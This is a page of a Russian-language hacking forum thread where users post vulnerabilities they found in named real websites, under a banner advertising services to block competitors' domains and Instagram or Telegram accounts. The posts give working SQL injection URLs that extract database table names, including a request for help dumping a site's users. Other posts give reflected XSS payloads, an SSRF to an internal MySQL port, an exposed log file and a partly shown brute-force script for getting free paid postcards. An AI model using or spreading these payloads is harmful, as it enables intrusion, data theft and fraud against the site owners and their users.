УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Уязвимости SQLi, XSS и другие.

Страница 24 из 35

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#231

15.04.2016, 22:26

kingbeef

Новичок

Регистрация: 08.04.2010

Сообщений: 1

Провел на форуме:
70640

Репутация: 0

Цитата:

Сообщение от pw0ned

pw0ned said:
↑
alert()
фильтрует

https://site.ua/search/?searchString=alert()

Не фильтрует

#232

19.04.2016, 20:57

Octavian

Guest

Сообщений: n/a

Провел на форуме:
97114

Репутация: 24

http://vic.md/ro/notebook/list/all/...VERSION(),225,26,27,28,29,30,31,32+AND+(1)=(1

Дальше не смог вывести пользователеи.В ЛС кто сделает это )

#233

19.04.2016, 22:06

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//vic.md/ro/notebook/list/all/1/producator_ID=9999)+and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database() limit 81,1),0x3a,floor(rand(0)*2))y from information_schema.tables  group by y ) x)+AND+(1)=(1 #[/COLOR][/COLOR]

AND+(1)=(1 это не нужно. Просто 9999 без )

#234

18.08.2016, 12:30

SaNDER

Guest

Сообщений: n/a

Провел на форуме:
51198

Репутация: 3

http://takky-shop.ru/images/img/log.txt

Открытый лог .

Reflected XSS

Код:

Code:
http://takky-shop.ru/category/">alert()

Код:

Code:
http://takky-shop.ru/search

в поисковике тоже XSS .

#235

22.08.2016, 19:16

waydam

Guest

Сообщений: n/a

Провел на форуме:
293

Репутация: 0

10minutemail.com

XSS

Еще интересная особенность, письмо дублируется много раз и каждый раз выскакивает алерт, не знаю с чем это связано)

#236

23.08.2016, 02:26

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

Да эти ХСС даже уязвимостью назвать нельзя

https://www.crazymailing.com хсс

#237

22.09.2016, 10:56

SooLFaa

Guest

Сообщений: n/a

Провел на форуме:
187765

Репутация: 154

Солью не столь давний ресерч дабы разбавить скульки да хсски. Как отправлять бесплатно открытки на сервисе voicecards.ru?

Логическая уязвимость на сервисе voicecard.ru, позволяет отправлять бесплатно голосовые открытки.

Баг находился в сервисе бонус кодов, то есть бонус код является номером. И при авторизации не через телефон, можно спокойно запустить JQuery скрипт, который с легкостью подберет его за секунды и отправит смс (в дальнейшем его приведу). Теперь детально:

Первое, авторизовываемся не через телефон, а средствами забытого пароля:

Вызываем форму отправки бонус кода, чтобы вызвать нужную нам форму для подбора.

Далее тупо перебираем скриптом в консоле

[CODE]
Code:
for (var i = 800000; i

#238

25.10.2016, 21:30

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

http://newipnow.com/

в ПОЛЕ URL В ВОДИМ 127.0.0.1:3306

S.S.R.F.

#239

29.11.2016, 17:17

Octavian

Guest

Сообщений: n/a

Провел на форуме:
97114

Репутация: 24

#240

29.11.2016, 20:51

pw0ned

Guest

Сообщений: n/a

Провел на форуме:
33728

Репутация: 14

http://golden-bird.biz/signup

Код:

Code:
login=">alert(/xss/)&email=1@email.com&pass=password&repass=password

Страница 24 из 35

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход